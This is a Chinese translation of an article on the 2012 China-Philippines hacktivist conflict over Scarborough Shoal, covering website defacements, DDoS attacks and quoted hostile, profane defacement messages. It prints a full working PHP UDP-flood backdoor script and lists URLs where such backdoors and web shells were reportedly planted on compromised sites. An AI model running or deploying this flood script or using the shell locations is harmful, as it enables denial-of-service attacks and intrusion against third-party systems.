我家菲佣是黑客 – 中菲网络战争全程回顾
小编注:本文翻译自国外的文章,请保持客观、理性的态度阅读!
多年来,在斯卡伯勒浅滩(菲)或者叫做黄岩岛(中)以及南沙岛,中国和菲律宾一直存在领土上的争端。由于之前中国在拒绝了菲律宾的关于搁置黄岩岛争议的提案后向南海派出了渔政船和军舰,所以当前最有争议的应该是黄岩岛了。
就在几天之后,黑客入侵了菲律宾大学的官方网站,留下一句话称他们来自中国并声明黄岩岛是中国的而不是菲律宾的。 
黑客攻击事件的消息传播的很快。因为那些人自称来自中国,一个名为Busabos的黑客入侵并篡改了中国三个网站的首页:star.chinaumu.org, v.cyol.com and ploft.cn。他还将这些网站的黑页发到了Facebook一个名为Anonymous #OccupyPhilippines的主页中,这个主页有超过1000名的喜爱者和追随者。这次事件发生在2012年4月21日。
在他的黑页中说道: STFU Chinese government is clearly retarded //中国ZF明显是*障 Scarborough Shoal //黄岩岛 Anonymous #OccupyPhilippines We are Anonymous, We are legion, We don’t forgive, We don’t forget //Anonymous组织的宣传标语 United as one Divided by zero, Expect us. 在他的黑页中还包括一个带着福克斯(Fawkes)面具的人,并在网页中嵌入了一首摇滚歌曲。根据他黑页中的内容,这个人看起来应该是Anonymous的支持者。
Busabos还在Facebook的Anonymous #OccupyPhilippines主页补充说他宁愿以这样的方式公开反对中国地下黑客在网络中的所作所为,也不想对当前他们所完成的入侵和篡改事件无动于衷。
也许你不知道busabos是谁,他就是2009-2010在菲律宾大选选举前的民意调查期间入侵菲律宾政府网站的人。事实上,在Zone-H里有他提交的很多网站入侵记录。
几分钟之后,一个名叫Supra Dick的人也在Facebook的这个主页中展示了他入侵的几个中国网站:
http://www.lanseyinxiang.com/phil.html http://www.sanxinsudi.com/index.html http://gh.rc.gov.cn http://www.ryjzw.com
入侵者有时也挺有意思,因为他们有时会拼错菲律宾的英文(>.<||)
我对以上黑客事件的第一印象是,它们可以触发两个国家之间的网络战争。
与此同时,在Facebook上,就像下面的这幅图像,因为两国的领土争端也成为了议论的热点。
菲律宾报复行动发生一天之后,菲律宾共和国总统的官邸和工作地点theMalacañang宫,呼吁结束对中国的网络攻击,因为它可能使局势恶化和紧张。菲律宾外交部助理秘书长发言人劳尔·埃尔南德斯说: “我们谴责这种网络攻击,不管他们来自哪一方,这些攻击行为是适得其反的,只会增加紧张局势,我们呼吁菲律宾和中国的网民更负责任一些,鼓励对话而不是进行不和谐的行为。” 然而,他的声明是没有用的,因为他们无法控制网络攻击背后那些人的思想,并且这个国家没有能够在此情况下采取行动的网络安全,取证和信息安全机构。事实上,国家调查局反欺诈及计算机犯罪部在网络取证方面已经被证明是无用的,没有良好的技术进行取证。这些结论是基于之前我对Busabos的采访,有人泄露了一段他与NBI(国家反欺诈及计算机犯罪调查部)的对话记录。菲律宾政府也希望建立一个机构能应对和处理这种窘境。
但不管怎样,从Hernandez的声明中找到了一个关键点:中国因为其资助网络间谍活动而著名,而且菲律宾的地下组织也在增长。因此很可能摩擦出网络战争的火花。他只是想叫停那些人,但我们也不能因此而责备他。
最后,2012年4月23日,总统发言人埃德温·Lacierda发出一份正式声明中说:
“大约在2012年4月23日下午,总统通信发展和战略规划办公室(PCDSPO)注意到一些拥有伪造的user-agents的恶意URL请求从国家政府官方网站(网址:www.gov.ph),到PCDSPO网站(网址:www.pcdspo.gov.ph),又到总统博物馆和图书馆网站(网址:www.malacanang.gov.ph),导致我们的服务器立刻相应延迟。我们确定,这是一次拒绝服务攻击。通过我们的数据分析收集的信息表明,网络攻击的IP地址来自中国。”
PCDSPO正试图保持网站的正常运营。但是请注意持续进行的攻击使我们只能暂时避免宕机。
这确实是一次来自中国的DDOS攻击,或者只是服务器在中国而真正的攻击者并不是中国?难道他们想伪造出可以追溯到中国的网络攻击?官方目前也没有任何反应,可能是因为保密原因。
我也不能确定这次攻击是否真的来自中国,因为没有足够的证据。况且谁愿意因为拥有本国的IP地址而被追踪。但这只是我的想法。如果中国真的想发动网络攻击他们应该会使用不同的网络,发起一系列的DoS攻击或者是DDoS。
当消息再次传开后,菲律宾的另一个地下组织,Privatex,决定加入Anonymous #OccupyPhilippines组,他们发起了第二次报复。这一次他们称他们的行动为#OpChinaDown。
下面是一些确认被黑的网站:
http://www.ocex.com.cn http://www.teawindow.com http://www.higvod.cn http://www.lzrk.gov.cn http://lppm.bigc.edu.cn/Pr1vX.htm http://xxb.leiyang.gov.cn/Pr1vX.htm http://en.founder.com.cn http://dxswl.cn http://www.cord.cn http://fmprc.gov.cn (DDos or DoS Attack) http://www.3322.net.cn http://wahsangtech.com/index.aspx
#OpChinaDown
最近发生在中国网站上的入侵事件只是针对有同样遭遇的菲律宾网站的简单回应。你可以继续欺负我们国家的海域,但我们绝对不会容忍你恐吓我们自己国家的网络服务。
这些入侵只是针对你们最开始行为的回应。我们并不是要开始什么,只是想告诉你,我们不希望在我们自己的网络中被过分欺负。
#OpChinaDown不是一种威胁。这将是一个答复,针对以后来自中国网络攻击的一个答复。我们把国家的争端留在政府手中,但这并不意味着我们不会支持他们。 Scarborough Shoal is ours. We are Anonymous We are Legion We do not Forgive We do not Forget United as One Divided by Zero Expect Us @AnonPinas 除了对中国网站的入侵,两组的支持者也发动了对中国政府网站的DDoS攻击和DoS攻击。事实上,来自Anonymous #OccupyPhilippines的Seethered向他获得权限的15个网站上上传了15份PHP UDPFlood后门,下面这些网站是他上传了UDPFlood 后门的网站:
http://spaneconi.com.mx/upd.php http://haventheatre.org/upd.php http://ainamedia.com/upd.php http://210.127.51.207/upd.php http://www.courseoutsource.com/upd.php http://www.tagsystems.org/upd.php http://cyberretailer.biz/upd.php http://www.thebirchproductions.com/upd.php http://minstermemorialsltd.co.uk/upd.php http://202.200.82.44/webdav/shell.php http://217.6.136.144/webdav/greenshell.php http://www.tingsbling.co.uk/upd.php http://ipswichinflatables.co.uk/upd.php http://inspireyogabrisbane.com.au/wp-content/themes/striking/cache/images/udp.php http://www.cutbackprod.com/wp-content/themes/aperture/cache/adik.php
根据我的分析,seethered上传的PHP UDPFlood,最初是由Hexbooter编码的。我偶然从网站上下载到了一份,我清理了其他后门。这里是一个恶意PHP代码的例子:
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);
$exec_time = $_GET['time'];
$time = time();
//print "Started: ".time('d-m-y h:i:s')."
";
$max_time = $time+$exec_time;
$host = $_GET['host'];
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type="submit" value="Go" /><!--<span class="hiddenSpellError" pre=""-->form>';
}else{ echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
IP: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';
}
?>
根据代码,它每秒发送65000数据包,并允许攻击者输入攻击的长度。
“他们想进行分布式拒绝服务,那我们就给他DDoS”Anonymous #OccupyPhilippines Facebook的管理员之一在主页说到。
像预言的那样,一些中国黑客,一位自称是Silic黑客组织的成员,成功渗透了菲律宾政府官方网站和部分预算管理网站。他留下一些话说:
“Hacked! Owned by Chinese Hackers!” “How come a small bitch border country are overconfident? And challenged to our Chinese super hacker?” “Remeber: Don’t Trouble Chinese, Don’t Play with Fire. All Members from Silic Group Hacker Army F*ck your mother and all your F8cking families”
他们还在主页挂了一面中国国旗。
现在,这些行为都使网络中的紧张局势升级。菲律宾或Pinoys和中国之间的网络战争虽然不像真正的战争那样致命。但如果这种行为不停止,可能也会危及到一些银行,电信,网上业务和其他电子商务网站。
参考文献:
https://www.facebook.com/pages/Anonymous-OccupyPhilippines/224402790971504
http://globalnation.inquirer.net/34021/china-deploys-gunboat
http://www.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the-denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/
http://www.interaksyon.com/infotech/budget-office-website-defaced-by-suspected-chinese-hackers
补充阅读:
http://en.wikipedia.org/wiki/Scarborough_Shoal